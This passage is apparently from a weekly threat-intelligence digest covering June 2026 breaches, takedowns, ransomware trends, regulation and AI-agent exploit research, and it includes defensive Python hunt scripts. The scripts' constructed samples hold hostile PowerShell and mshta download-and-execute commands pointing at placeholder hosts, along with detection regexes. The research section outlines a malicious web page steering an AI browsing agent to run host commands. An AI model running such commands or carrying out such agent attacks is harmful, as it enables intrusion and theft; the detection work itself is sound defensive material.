Critical-infrastructure exposure ran from cyber intrusion to physical mishandling. Handala's Cal Water breach (above) and the Rockwell ICS advisory batch (§ 3) bracket the cyber end; at the process end, a Kyushu Electric subsidiary lost an unencrypted portable SSD holding ~10.9M customer records — reportedly Japan's largest personal-data breach (BleepingComputer, 2026-06-14; daily 06-14). The Gentlemen's Mackay Sugar claim (§ 2) halted milling at two of three mills — an OT-adjacent production impact even without confirmed OT-network compromise.

Technology & SaaS supply chain — the week's busiest victim class

The most active victim class was technology and SaaS, reflecting the week's supply-chain theme (§ 6). Klue/Icarus (§ 2) cascaded through a SaaS integrator's customer base; Nintendo employee data was stolen from third-party HR-survey SaaS TinyPulse, not Nintendo's own systems (BleepingComputer, 2026-06-20; daily 06-20); a WordPress supply-chain compromise via Awesome Motive's CDN backdoored ~1.2M sites (Sansec, 2026-06-16; daily 06-16); and the Mastra npm scope compromise was attributed to North Korea (§ 6). The cross-cutting lesson: the breach increasingly enters through a vendor's plumbing, not the victim's perimeter.

5. Incidents & disclosures recap

Law-enforcement momentum — Operation Endgame expands, Silver Fox mass-arrest, Conti loader plea

The week was unusually strong on enforcement follow-through. A coordinated international action on 2026-06-18 expanded Operation Endgame to SocGholish/TA569, dismantling 106 C2 servers and stripping the FakeUpdates loader from 14,971 WordPress sites (Politie, 2026-06-18; daily 06-19). Chinese police arrested 67 members of the Silver Fox (Winos/ValleyRAT) cybercrime network across five provinces (Risky Business, 2026-06-18; daily 06-18), and Conti loader developer Oleksii Lytvynenko pleaded guilty in US federal court after extradition from Ireland (Global Security, 2026-06-12; daily 06-14). For defenders, the Endgame action is the operationally useful one: SocGholish/FakeUpdates is a standard initial-access broker for ransomware, so the takedown measurably degrades a common entry path — though TA569's history of rebuilding means the relief is likely temporary.

Insider and process failures — Munich school data, a lost SSD, and an NHS records caution

Several of the week's incidents were not external intrusions at all. Munich's municipal IT subsidiary is investigating ~120,000 student records suspected on the darknet, with a terminated employee under investigation (Heise, 2026-06-17; daily 06-17). The Kyushu Electric SSD loss (§ 4) was a physical-custody failure. And the UK ICO closed a two-year criminal investigation into deliberate misuse of Catherine, Princess of Wales' medical records at The London Clinic with a formal caution (ICO, 2026-06-19; daily 06-19). The common thread: privileged-insider and data-custody controls — offboarding, removable-media encryption, and access auditing on sensitive records — are as consequential as perimeter defence.

The third-party breach as the week's dominant entry vector

The clearest cross-cutting theme of the week's incidents is that the breach increasingly entered through someone else's systems. iRhythm (social-engineered third-party app), Nintendo (TinyPulse HR SaaS), Texas Parks & Wildlife (unnamed licensing vendor) and the Klue/Icarus cascade (§ 2) all share the same root pattern: the victim's own perimeter held, but a supplier's did not. This is the operational case for extending vendor-access governance — OAuth-grant inventory, supplier breach-notification SLAs, and least-privilege on integration credentials — into the same tier as perimeter hardening, because that is where this week's data actually left.

6. Research & threat-actor developments

Research: the AI agent and toolchain control plane became a concrete attack-surface class this week

The week's single most important research synthesis is that the AI developer toolchain — gateways, agents, IDE plugins and the Model Context Protocol — stopped being a theoretical risk and accumulated a cluster of working exploit chains. Microsoft's AutoJack showed a single malicious web page can drive host-level RCE through an AI browsing agent's local MCP WebSocket: a three-flaw chain in AutoGen Studio (origin-allowlist bypass, missing auth on /api/mcp/*, and OS command injection via StdioServerParams) lets an attacker-steered agent reach a privileged localhost socket and execute arbitrary host processes (Microsoft Security, 2026-06-18; daily 06-20). That sits alongside the week's other AI-surface disclosures: Obsidian Security's three-CVE LiteLLM chain turning any gateway user into root (Obsidian, 2026-06-16; daily 06-16), Varonis "SearchLeak" one-click M365 Copilot data exfiltration (CVE-2026-42824) (Varonis; daily 06-16), Unit 42's "Pickle in the Middle" cross-tenant code execution in Google Vertex AI (CVE-2026-2473) (Unit 42; daily 06-17), and 15 malicious JetBrains Marketplace plugins exfiltrating AI-provider API keys (Aikido; daily 06-18). Sophos X-Ops' underground-AI report (daily 06-19) confirms criminal interest in exactly these agent frameworks. The defender takeaway for CH/EU public-sector teams adopting AI tooling: treat self-hosted AI gateways and agent frameworks as internet-adjacent application servers — bind MCP/agent sockets to loopback behind a host firewall, run them under low-privilege isolated accounts, never on shared or production hosts, and rotate the API keys and cloud credentials these tools concentrate.

Changes since first coverage (2 prior appearances)
  1. 2026-06-17
  2. 2026-06-16
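
An added example serving both the Splunk sidecar segmentation check in § 1 and the loopback-binding advice above (not code from Splunk, Microsoft or the original summary): a small parser for `ss -ltnp` output that reports services expected to be loopback-only but bound on every interface. The sample output is constructed with invented PIDs; port 5435 comes from the Splunk changelog entry in § 1, while the 8081 agent/MCP port is an assumption for illustration, not a value from the AutoGen Studio report.

```python
import ipaddress
import re

# Constructed `ss -ltnp` output (invented PIDs). Port 5435 is the Splunk PostgreSQL sidecar
# port cited in the changelog above; 8081 stands in for an agent/MCP WebSocket port and is
# an assumption for this example, not a value taken from the AutoGen Studio report.
SAMPLE_SS = """\
State   Recv-Q  Send-Q   Local Address:Port    Peer Address:Port  Process
LISTEN  0       128      127.0.0.1:5435        0.0.0.0:*          users:(("postgres",pid=2110,fd=6))
LISTEN  0       4096     0.0.0.0:8081          0.0.0.0:*          users:(("python3",pid=3344,fd=9))
LISTEN  0       128      [::1]:8081            [::]:*             users:(("python3",pid=3344,fd=10))
LISTEN  0       4096     *:8089                *:*                users:(("splunkd",pid=1800,fd=12))
LISTEN  0       128      10.10.0.5:22          0.0.0.0:*          users:(("sshd",pid=900,fd=3))
"""

# Services that must only be reachable from the host itself (port -> role).
LOOPBACK_ONLY = {5435: "Splunk PostgreSQL sidecar", 8081: "agent/MCP WebSocket (assumed port)"}
PROC_RE = re.compile(r'\("([^"]+)",pid=(\d+)')


def parse_ss(text):
    """Parse `ss -ltnp` style lines into listener dicts (address, port, process, pid)."""
    listeners = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 5 or parts[0] != "LISTEN":
            continue                                   # header or non-listening row
        addr, port = parts[3].rsplit(":", 1)           # handles [::1]:8081 and *:8089
        m = PROC_RE.search(parts[-1]) if parts[-1].startswith("users:") else None
        listeners.append({"addr": addr.strip("[]"), "port": int(port),
                          "process": m.group(1) if m else None,
                          "pid": int(m.group(2)) if m else None})
    return listeners


def exposure(addr):
    """Classify a bind address: loopback, a specific interface, or every interface."""
    if addr in ("*", "0.0.0.0", "::"):
        return "all-interfaces"
    return "loopback" if ipaddress.ip_address(addr).is_loopback else "specific-interface"


def audit_listeners(text, loopback_only=None):
    """Return the listeners on loopback-only ports that are bound more widely than that."""
    loopback_only = LOOPBACK_ONLY if loopback_only is None else loopback_only
    findings = []
    for lst in parse_ss(text):
        lst["exposure"] = exposure(lst["addr"])
        if lst["port"] in loopback_only and lst["exposure"] != "loopback":
            findings.append({**lst, "role": loopback_only[lst["port"]],
                             "fix": "rebind to 127.0.0.1/::1 and block the port in the host firewall"})
    return findings


if __name__ == "__main__":
    for f in audit_listeners(SAMPLE_SS):
        print(f"{f['role']}: {f['process']} (pid {f['pid']}) listens on "
              f"{f['addr']}:{f['port']} [{f['exposure']}] -> {f['fix']}")
```

In the constructed output the sidecar is correctly on 127.0.0.1 while the agent process listens on both `0.0.0.0:8081` and `[::1]:8081`; only the wildcard bind is reported. A loopback bind is necessary but not sufficient for the AutoJack class of issue, since the browsing agent itself runs on the host, so pair it with the authentication and origin checks the research describes rather than treating the bind address as the only control.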

Research: ClickFix matured into a productised malware-as-a-service supply chain

A second cross-day research thread: the ClickFix technique — fake browser/update dialogues that trick users into pasting attacker PowerShell — has industrialised. Sekoia documented ErrTraffic, a ClickFix Malware-as-a-Service framework that resolves its C2 through the Polygon blockchain (Sekoia, 2026-06-17; daily 06-17), and Huntress detailed the Potemkin loader delivering RMMProject RAT through a ClickFix chain that also bypasses Chromium App-Bound Encryption (Huntress, 2026-06-17; daily 06-17). ErrTraffic also surfaced as one of the SocGholish-adjacent clusters still operating after the Operation Endgame takedown (§ 8). The pattern for defenders: ClickFix is now a delivery channel with multiple competing operators and resilient C2, so user-paste-to-PowerShell detection (clipboard-sourced powershell.exe/mshta.exe invocations, RunMRU artefacts) is worth promoting from awareness training to a standing hunt.
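
The paste-to-PowerShell hunt the paragraph promotes, as an added example that is not code from Sekoia, Huntress or the original summary: it scores constructed Sysmon-style process-creation records (Event ID 1 field names) and a constructed RunMRU value set for the ClickFix shape, a script interpreter launched from the shell with a hidden window, an inline download-and-evaluate, or a remote `mshta` target, and it decodes `-EncodedCommand` payloads before matching so the indicators are not hidden by base64. The hostnames, commands and users are invented, and the scoring rule (explorer.exe parent plus at least two indicators, or any remote mshta launch) is an assumption to tune against your environment.

```python
import base64
import re


def _enc(ps: str) -> str:
    """Encode a PowerShell command the way -EncodedCommand expects (UTF-16LE, base64).
    Used only to build the constructed sample below."""
    return base64.b64encode(ps.encode("utf-16-le")).decode()


# Constructed Sysmon-style Event ID 1 records (invented users, hosts and commands).
SAMPLE_PROCESS_EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "User": r"CORP\jdoe",
     "CommandLine": 'powershell -w hidden -c "iex (irm http://captcha.example.invalid/verify)"'},
    {"Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "User": r"CORP\asmith",
     "CommandLine": "mshta http://fix.example.invalid/update.hta"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "User": r"CORP\bkhan",
     "CommandLine": "powershell -NoP -W Hidden -EncodedCommand "
                    + _enc("iex (New-Object Net.WebClient).DownloadString('http://cdn.example.invalid/a.ps1')")},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",   # benign admin script
     "ParentImage": r"C:\Windows\System32\cmd.exe", "User": r"CORP\svc_sccm",
     "CommandLine": r"powershell -File C:\scripts\inventory.ps1"},
]

# Constructed HKCU\...\Explorer\RunMRU values: what was typed into Win+R, each ending in \1.
SAMPLE_RUNMRU = {
    "a": r'powershell -w hidden -c "iex (irm http://captcha.example.invalid/verify)"\1',
    "b": r"notepad\1",
    "MRUList": "ab",
}

INTERPRETERS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe", "wscript.exe", "cscript.exe"}
RUN_DIALOG_PARENTS = {"explorer.exe"}     # the Run box spawns children from the shell process
INDICATORS = {
    "hidden_window":   re.compile(r"-w(?:indowstyle)?\s+h(?:idden)?\b", re.I),
    "encoded_command": re.compile(r"-e(?:c|nc(?:odedcommand)?)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    "remote_fetch":    re.compile(r"\b(?:irm|iwr|invoke-restmethod|invoke-webrequest|downloadstring|downloadfile|curl|wget)\b", re.I),
    "inline_eval":     re.compile(r"\b(?:iex|invoke-expression)\b", re.I),
    "mshta_remote":    re.compile(r"mshta(?:\.exe)?\s+\S*https?://", re.I),
    "url":             re.compile(r"https?://", re.I),
}


def expand_encoded(cmdline):
    """Append the decoded -EncodedCommand payload so the indicators can see through base64."""
    m = re.search(r"-e(?:c|nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]{20,})", cmdline, re.I)
    if not m:
        return cmdline
    try:
        decoded = base64.b64decode(m.group(1), validate=True).decode("utf-16-le", errors="ignore")
    except ValueError:
        return cmdline
    return f"{cmdline} <decoded:{decoded}>"


def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify_process(ev):
    """Score one process-creation record; 'flagged' marks the ClickFix shape."""
    image, parent = _basename(ev["Image"]), _basename(ev["ParentImage"])
    hits = [name for name, rx in INDICATORS.items() if rx.search(expand_encoded(ev["CommandLine"]))]
    from_run_dialog = parent in RUN_DIALOG_PARENTS
    flagged = image in INTERPRETERS and ((from_run_dialog and len(hits) >= 2) or "mshta_remote" in hits)
    return {"user": ev.get("User"), "image": image, "parent": parent,
            "from_run_dialog": from_run_dialog, "indicators": hits, "flagged": flagged}


def scan_runmru(values):
    """Flag RunMRU entries (pasted Run-box commands) that carry two or more indicators."""
    findings = []
    for name, raw in values.items():
        if name == "MRUList":
            continue
        cmd = raw[:-2] if raw.endswith("\\1") else raw
        hits = [n for n, rx in INDICATORS.items() if rx.search(expand_encoded(cmd))]
        if len(hits) >= 2:
            findings.append({"value_name": name, "command": cmd, "indicators": hits})
    return findings


if __name__ == "__main__":
    for r in (classify_process(e) for e in SAMPLE_PROCESS_EVENTS):
        print(("FLAG " if r["flagged"] else "ok   ") + f"{r['user']} {r['image']} <- {r['parent']} {r['indicators']}")
    for f in scan_runmru(SAMPLE_RUNMRU):
        print(f"RunMRU {f['value_name']}: {f['indicators']}")
```

The RunMRU scan is the forensic complement to the live process rule: it survives a reboot and shows what the user actually pasted, which helps when the process telemetry has rolled over. Both checks are deliberately content-based rather than URL-based, so they keep working when the operator rotates the lure domain.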

Threat actor: DPRK Sapphire Sleet escalates npm supply-chain attacks with the Mastra compromise

Microsoft attributed the Mastra npm scope compromise — first covered as an unattributed supply-chain event on 2026-06-18 — to Sapphire Sleet (BlueNoroff / UNC1069), making it the actor's second major npm strike of 2026 after the April Axios attack (Microsoft Security, 2026-06-17; BleepingComputer, 2026-06-18; daily 06-21). The operators compromised a maintainer account whose scope access was never revoked and published 140+ malicious @mastra packages within a ~20-minute window, using an easy-day-js typosquat of dayjs to run a postinstall dropper with cross-platform persistence (Registry Run key, macOS LaunchAgent, Linux systemd unit) that exfiltrated browser-wallet extensions, cloud credentials, LLM API keys, CI/CD tokens and SSH keys. The recurrence establishes a clear DPRK pattern of targeting the AI developer toolchain's supply chain specifically — the same surface § 6's first item flags. Run npm install --ignore-scripts in CI, pin lockfile versions, and rotate credentials on any host that pulled @mastra packages in the days before the 17 June disclosure.

Threat actor: FishMonger (I-SOON) ports SprySOCKS to Windows with a kernel-mode rootkit

ESET's full research paper detailed two previously undocumented Windows variants of the SprySOCKS backdoor attributed to FishMonger (Earth Lusca / Aquatic Panda — the Winnti-contractor tracked as I-SOON), centred on a RawWNPF.sys kernel driver that hides processes (NtQuerySystemInformation hook), network connections (nsiproxy.sys IOCTL interception), files (minifilter callbacks) and persistence registry keys, and redirects crafted TCP packets to a hidden backdoor port via the Windows Filtering Platform (ESET, 2026-06-16; daily 06-17). Background: FishMonger has been publicly tracked since the 2024 I-SOON contractor-leak exposed its government-espionage-for-hire model; ESET's earlier work documented the Linux SprySOCKS lineage, and this report extends the toolkit to a Windows kernel rootkit with a possible UEFI-bootkit component (leveraging the patched BlackLotus Secure Boot bypass, CVE-2023-24932). Confirmed victims are government organisations in Honduras, Taiwan, Thailand and Pakistan; the targeting class — government and defence — keeps EU government networks in scope. Enable the vulnerable-driver blocklist, hunt for the named driver and for process/network-hiding behaviours, and verify Secure Boot is at current patch level.

Threat actor: INC ransomware's Rust rewrite and BYOVD evolution

Acronis and The Hacker News documented the evolution of INC ransomware into a top-tier RaaS — 830+ victims since 2023, fourth in Q1 2026 — with a Rust rewrite of its Windows and Linux/ESXi encryptors, BYOVD EDR-termination using the drivers filwfp.sys / filnk.sys / fildds.sys (the same set seen in earlier Vanilla Tempest campaigns), a Veeam credential dumper for backup infrastructure, and two source-code-leak-derived variants (Lynx, Sinobi) (Acronis TRU, 2026-06-18; The Hacker News, 2026-06-19). The geography is incidental for a CH/EU SOC — the cited reporting puts the majority of INC's victims in the US — but the tradecraft is not: the three BYOVD drivers, the Veeam backup-credential dumper, and the cross-platform Rust encryptor are detection content that generalises to any victim. Detect the three BYOVD drivers via driver-load events with a hash blocklist, alert on Veeam process-memory access from unexpected parents, and keep backup systems MFA-protected and network-isolated.

Research: usbliter8 — an unpatchable SecureROM boot-chain exploit for Apple A12/A13 silicon

Paradigm Shift published usbliter8, a working SecureROM (burned-in, unpatchable boot code) exploit for Apple A12 and A13 SoCs via a hardware-level USB DMA buffer underflow combined with a firmware configuration flaw, achieving pre-boot arbitrary code execution in under two seconds (9to5Mac, 2026-06-18; daily 06-20). It requires physical possession in DFU mode with a dedicated RP2350 board; the Secure Enclave is not compromised, so passcodes and encrypted user data remain protected — the risk class is forensic/intelligence-collection on seized devices, not remote exploitation. For CH/EU public-sector MDM/BYOD fleets the operational consequence is a hardware-refresh planning input: affected devices (iPhone XR/XS/11 generations, several iPads, older Apple Watches and HomePod mini) cannot be patched, so high-sensitivity-role devices on A12/A13 silicon should be prioritised for replacement and protected with physical-custody controls.

7. Annual / periodic threat reports

DORA Year 1 — the ESAs' first annual ICT-incident report: 3,383 major incidents, a third cross-border, only ~10% cyber

The European Supervisory Authorities (EBA, EIOPA, ESMA) published their first annual overview of major ICT-related incidents reported under DORA, covering 2025 (EBA, 2026-06-03; EIOPA, 2026-06-03). The findings most useful to a defender: 3,383 major incidents across EU financial sectors; roughly one-third had cross-border impact — the borderless-interconnection risk the DORA reporting regime exists to surface, with the ESAs stating "ICT risks are increasingly borderless and interconnected"; and cybersecurity incidents made up only ~10% of the total, with system failures and operational events dominating. The ESAs explicitly flag AI-driven attack tooling as an emerging multiplier that could shift that baseline rapidly. For Swiss financial entities under FINMA — not bound by DORA but operating to comparable operational-resilience expectations — the report is a useful peer benchmark for what a European incident profile looks like under comparable obligations.

Check Point State of Ransomware Q1 2026 — ecosystem consolidation, with Switzerland and Germany named

Surfaced this week for its CH/EU-specific findings, Check Point's Q1 2026 ransomware report (published 11 May, not covered in the dailies) documents a structural consolidation: the top 10 groups now hold 71.1% of all leak-site victims, the highest concentration since early 2024 and a reversal of two years of fragmentation — meaning defenders face fewer but more professionalised adversaries (Check Point Research; corroborated by Emsisoft). The Gentlemen grew +315% quarter-on-quarter (explaining this week's Mackay Sugar and GentleKiller coverage in § 2) and LockBit 5.0 resurged +106% on a Rust rewrite. The geography is the operative detail for this audience: Switzerland — Check Point notes Akira accounts for roughly 31% of Swiss ransomware victims, and Germany is the #2 country globally for ransomware victims (Emsisoft). The synthesis a Swiss SOC should take: Akira is the dominant ransomware threat to model against domestically, and the consolidation trend favours investing detection effort against a smaller set of high-capability operators (Qilin, Akira, The Gentlemen, LockBit 5.0).

8. Long-running campaigns — status update

Chaotic Eclipse / Nightmare Eclipse zero-day wave — RoguePlanet (CVE-2026-50656) still unpatched, PoC works on June builds

key: item:nightmare-chaotic-eclipse-zero-day-wave-the-defender-lpe-now. The serialised Windows zero-day campaign the W24 weekly consolidated has a worsening status. As of 2026-06-21, CVE-2026-50656 (RoguePlanet) remains unpatched. The exploit abuses a Time-of-Check-to-Time-of-Use race in Microsoft Defender's file-processing workflow (CWE-59): Defender checks a file path under SYSTEM, then reopens it, and the exploit swaps the file in the gap to get SYSTEM-level execution (Help Net Security, 2026-06-17; MSRC; daily 06-19). The PoC is validated against fully-patched Windows 10 and 11 including the June 2026 Patch Tuesday build, Real-Time Protection status is irrelevant, and the researcher states small PoC changes defeat mitigations — "the only thing you can realistically do is wait for a patch." Microsoft confirms a fix is in development with no timeline. This is post-initial-access privilege escalation (local auth required), so it compounds rather than initiates a breach; until a patch ships, the realistic controls are application allowlisting to constrain post-exploitation and hunting for MsMpEng.exe spawning unexpected children or temp-directory symlink manipulation timed to scans. Outstanding question to watch: whether Microsoft ships an out-of-band fix or holds it to July Patch Tuesday.

Changes since first coverage (1 prior appearance)
  1. 2026-06-19: CVE assignment + MSRC 'Exploitation More Likely'; update to 2026-W24
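Three hunts this digest recommends share one shape, a predicate over endpoint telemetry: the § 6 ClickFix paste-to-run artefacts (RunMRU registry writes and explorer.exe-parented powershell.exe/mshta.exe launches), the § 6 INC BYOVD driver set, and the MsMpEng.exe-spawning-unexpected-children hunt for RoguePlanet above. The code below is an added example written for this digest, not from Microsoft, Acronis, ESET or any cited report; it runs those three rules over a constructed Sysmon-shaped event sample. The driver file names are the ones the INC item names; the hash blocklist entry, the Defender child allowlist, and every path, SID and URL are placeholders to replace with your environment's values.

```python
"""Three hunt rules from this digest, run over a Sysmon-shaped event sample.

Hypothetical example code added here; it is not from Microsoft, Acronis,
ESET or any cited report.  Rules:
  1. ClickFix paste-to-run: a RunMRU registry write (Sysmon EventID 13) naming
     an interpreter, or an explorer.exe-parented powershell/mshta launch
     (EventID 1) carrying a URL, encoded-command or hidden-window marker.
  2. INC BYOVD: a driver load (EventID 6) of filwfp.sys / filnk.sys / fildds.sys
     (names from the digest) or a SHA256 on a blocklist (placeholder here).
  3. RoguePlanet follow-up: MsMpEng.exe spawning an unexpected child (EventID 1).
SAMPLE_EVENTS is constructed; paths, SIDs, hashes and URLs are placeholders.
"""
import re
from pathlib import PureWindowsPath

BYOVD_DRIVER_NAMES = {"filwfp.sys", "filnk.sys", "fildds.sys"}
BYOVD_SHA256 = {"00" * 32}                    # placeholder, constructed
PASTE_INTERPRETERS = {"powershell.exe", "pwsh.exe", "mshta.exe"}
INTERPRETER_STEMS = ("powershell", "pwsh", "mshta")
PASTE_MARKERS = re.compile(r"https?://|-enc|-w\s+h|\biex\b", re.IGNORECASE)
# Assumption: in a normal fleet the Defender engine only spawns its own CLI;
# tune this allowlist against your own baseline before alerting on it.
DEFENDER_EXPECTED_CHILDREN = {"mpcmdrun.exe"}


def _basename(path):
    return PureWindowsPath(path or "").name.lower()


def _sha256(hashes):
    """Pull the SHA256 out of Sysmon's 'SHA256=...,MD5=...' Hashes field."""
    for part in (hashes or "").split(","):
        algo, _, value = part.partition("=")
        if algo.strip().upper() == "SHA256":
            return value.strip().lower()
    return None


def check_clickfix(ev):
    if ev["EventID"] == 13 and "\\runmru\\" in ev.get("TargetObject", "").lower():
        details = ev.get("Details", "")
        if any(stem in details.lower() for stem in INTERPRETER_STEMS):
            return {"rule": "clickfix-runmru", "evidence": details}
    if (ev["EventID"] == 1
            and _basename(ev.get("ParentImage")) == "explorer.exe"
            and _basename(ev.get("Image")) in PASTE_INTERPRETERS
            and PASTE_MARKERS.search(ev.get("CommandLine", ""))):
        return {"rule": "clickfix-process", "evidence": ev["CommandLine"]}
    return None


def check_byovd(ev):
    if ev["EventID"] != 6:
        return None
    driver = ev.get("ImageLoaded", "")
    if _basename(driver) in BYOVD_DRIVER_NAMES or _sha256(ev.get("Hashes")) in BYOVD_SHA256:
        return {"rule": "byovd-driver", "evidence": driver}
    return None


def check_defender_child(ev):
    if (ev["EventID"] == 1 and _basename(ev.get("ParentImage")) == "msmpeng.exe"
            and _basename(ev.get("Image")) not in DEFENDER_EXPECTED_CHILDREN):
        return {"rule": "defender-child", "evidence": ev.get("CommandLine", ev.get("Image"))}
    return None


RULES = (check_clickfix, check_byovd, check_defender_child)


def hunt(events):
    """Apply every rule to every event; return the list of alerts in event order."""
    alerts = []
    for ev in events:
        for rule in RULES:
            hit = rule(ev)
            if hit:
                hit["host"] = ev.get("Computer", "?")
                alerts.append(hit)
    return alerts


RUNMRU = r"HKU\S-1-5-21-0-0-0-1001\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU"
DEFENDER_DIR = r"C:\ProgramData\Microsoft\Windows Defender\Platform\0.0.0.0-0"
SAMPLE_EVENTS = [  # constructed sample telemetry
    {"EventID": 13, "Computer": "WS01", "TargetObject": RUNMRU + r"\a", "Details": r"notepad\1"},
    {"EventID": 13, "Computer": "WS01", "TargetObject": RUNMRU + r"\b",
     "Details": r'powershell -w hidden -c "irm http://lure.example.invalid/fix | iex"\1'},
    {"EventID": 1, "Computer": "WS01", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell -w hidden -c "irm http://lure.example.invalid/fix | iex"'},
    {"EventID": 6, "Computer": "SRV02", "ImageLoaded": r"C:\Windows\Temp\filwfp.sys", "Hashes": "SHA256=" + "11" * 32},
    {"EventID": 6, "Computer": "SRV02", "ImageLoaded": r"C:\Windows\System32\drivers\ndis.sys", "Hashes": "SHA256=" + "22" * 32},
    {"EventID": 1, "Computer": "WS03", "ParentImage": DEFENDER_DIR + r"\MsMpEng.exe",
     "Image": r"C:\Windows\System32\cmd.exe", "CommandLine": "cmd.exe /c whoami"},
    {"EventID": 1, "Computer": "WS03", "ParentImage": DEFENDER_DIR + r"\MsMpEng.exe",
     "Image": DEFENDER_DIR + r"\MpCmdRun.exe", "CommandLine": "MpCmdRun.exe -Scan"},
]

if __name__ == "__main__":
    for a in hunt(SAMPLE_EVENTS):
        print(f"[{a['rule']}] {a['host']}: {a['evidence']}")
```

The RunMRU rule fires on the registry artefact itself, so it still catches a paste-to-run that the process-creation sensor missed; the BYOVD rule matches on file name as well as hash because the digest names the drivers while their hashes vary by campaign, and the name match is what the hash blocklist should be tuned around.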

SocGholish / TA569 — Operation Endgame seized 106 servers, but seven delivery clusters remain operational

key: item:operation-endgame-expands-to-socgholish-ta569-106-c2-servers. The Operation Endgame takedown (§ 5) was the headline; Proofpoint's post-action analysis is the status update that matters for the longer arc. TA569 served for years as a primary distribution layer for WastedLocker (Evil Corp), LockBit and RansomHub, and while law enforcement seized over 100 servers and 14,971 WordPress sites were remediated, seven FakeUpdates-style clusters remain operational — TA2726, TA2727, ZPHP, ErrTraffic (the ClickFix MaaS in § 6), LandUpdate808/KongTuke, GeoTDS and tdsshop (Proofpoint, 2026-06-18; daily 06-19). Proofpoint also notes WordPress sites frequently reinfect because the underlying credential compromise outlives CMS-level cleanup. The defender consequence: the fake-update initial-access vector is degraded, not closed — keep GPO restrictions on JScript/WSH execution from user-writable paths, browser isolation for email links, and (for WordPress operators) full credential rotation plus FIM after any cleanup, because removing the loader without rotating credentials invites reinfection.

9. Policy & regulatory horizon

EDPB adopts a harmonised GDPR Article 33 breach-notification template — consultation open to 5 August

The EDPB adopted a draft common EU/EEA personal-data-breach notification template at its June plenary and opened public consultation until 5 August 2026 (EDPB, 2026-06-10). The template is a structured common form with predefined answer options and fill-in guidance, designed to replace the current patchwork in which each national DPA maintains its own notification form. After 5 August the EDPB will publish a timeline for mandatory adoption by all DPAs — the point at which it becomes the channel. What defenders should do differently: breach-response process owners with multi-jurisdiction obligations should review the draft now and begin aligning their incident-response notification playbooks to the common template. Swiss organisations under the nFADP have no direct EDPB obligation but need aligned preparation for any EU-nexus incident notifiable to an EU DPA.

CRA reporting obligation lands 11 September — ENISA Single Reporting Platform access manual due, dry-runs before go-live

The first Cyber Resilience Act obligation to bind, from 11 September 2026, requires manufacturers of products with digital elements to report actively exploited vulnerabilities (24-hour early warning + 72-hour notification + final report) and severe incidents through ENISA's Single Reporting Platform (EC Digital Strategy; ENISA SRP). ENISA committed to publishing access manuals and registration instructions during June 2026 with a dry-run period before go-live. Swiss companies exporting products with digital elements to the EU are directly in scope, with NCSC/GovCERT.ch as the designated national-CSIRT counterpart for the simultaneous-notification routing. With the deadline ~82 days out, in-scope manufacturers should begin SRP registration preparation and build the 24/72-hour reporting workflow into their PSIRT process now.

NIS2 transposition remains incomplete — France and Spain still among the laggards

NIS2 transposition is still incomplete across several Member States more than 18 months after the October 2024 deadline, with most of the EU now compliant but a minority — France and Spain among them — still lagging (EC Digital Strategy — NIS transposition tracker; Viktoria Compliance NIS2 tracker). France in particular has not yet enacted its NIS2 transposition vehicle, which means the national authority cannot formally designate in-scope entities or apply sanctions there — and NIS2-derived incident-notification obligations on French entities are therefore not yet enforceable. The operational consequence for Swiss organisations with French or Spanish supply-chain or data-processing counterparts: do not assume NIS2 notification and security obligations are operative in those jurisdictions yet, and confirm the contractual basis for any incident-notification flow rather than relying on a not-yet-transposed statutory one.

G7 Évian cybersecurity declaration calls PQC an "urgent priority" — and the expected hacktivist DDoS materialised on day one

The G7 Cybersecurity Working Group declaration, adopted around the Évian summit (15–17 June), names post-quantum cryptography an "urgent priority" with a call for coordinated industry-government migration, alongside AI-cyber dual-use risk, telecom resilience and SME cybersecurity; the European Commission issued a welcome statement linking it to the NIS2/CRA stack (ANSSI; European Commission, 2026-06-17). The PQC-urgency framing aligns with Swiss federal cryptographic-migration planning. Resolving the W24 looking-ahead watch item: the NCSC-CH-predicted hacktivist DDoS did materialise — NoName057(16) ran layer-7 DDoS on 15 June against public-sector and tourism sites in the Swiss-bordering Haute-Savoie department (Évian-les-Bains, Thonon-les-Bains, Saint-Gingolph municipalities, the EVA'D transport portal), causing temporary outages with no data compromise (Cyberattaque.org, 2026-06-16; NCSC-CH pre-event advisory). Attribution rests on the group's Telegram self-claim; no Swiss federal sites were reported hit. The lesson reconfirmed: NCSC-CH's pre-event DDoS guidance for summit-adjacent organisations was correctly calibrated, and the NoName057(16) pattern around Swiss-adjacent summits (cf. Bürgenstock 2024) holds.

UK ICO left leaderless mid-restructure — Commissioner resigns with immediate effect

UK Information Commissioner John Edwards resigned with immediate effect on 19 June after an independent workplace investigation found "a case to answer" over his conduct; Chief Executive Paul Arnold now holds Commissioner responsibilities under a scheme of delegation while a DSIT/parliament appointment process expected to take months runs its course (ICO, 2026-06-19; Computer Weekly, 2026-06-19; daily 06-21). This is a regulatory-capacity story for any Swiss or EU organisation with UK operations: the ICO's enforcement posture under Edwards (high-profile fines, age-assurance actions) is not guaranteed to continue unchanged under interim leadership, and the regulator is short its top accountability anchor at a time it is also mid-restructure. Defenders should not read the vacuum as reduced obligation — UK GDPR duties are unchanged — but enforcement timing and priorities may shift during the interregnum.

NCSC-CH — fake Swiss Post "Avis de passage" QR-code phishing in French-speaking Switzerland

NCSC-CH's Week 24 Wochenrückblick flagged a hybrid physical-plus-digital social-engineering campaign in French-speaking Switzerland: attackers drop fake Swiss Post collection-notice ("Avis de passage") letters into letterboxes, closely mimicking official branding, with a QR code leading to a phishing site that harvests identity and credit-card data (NCSC-CH, 2026-06-16). The physical-delivery vector defeats email-gateway controls entirely. Public-sector organisations in French-speaking cantons should brief staff on the physical-QR lure, since the Swiss Post brand is frequently abused and a letterbox-delivered QR bypasses every email-based phishing control.

10. Looking ahead — what to watch next week

A focused, justified list — items already in motion, not predictions.

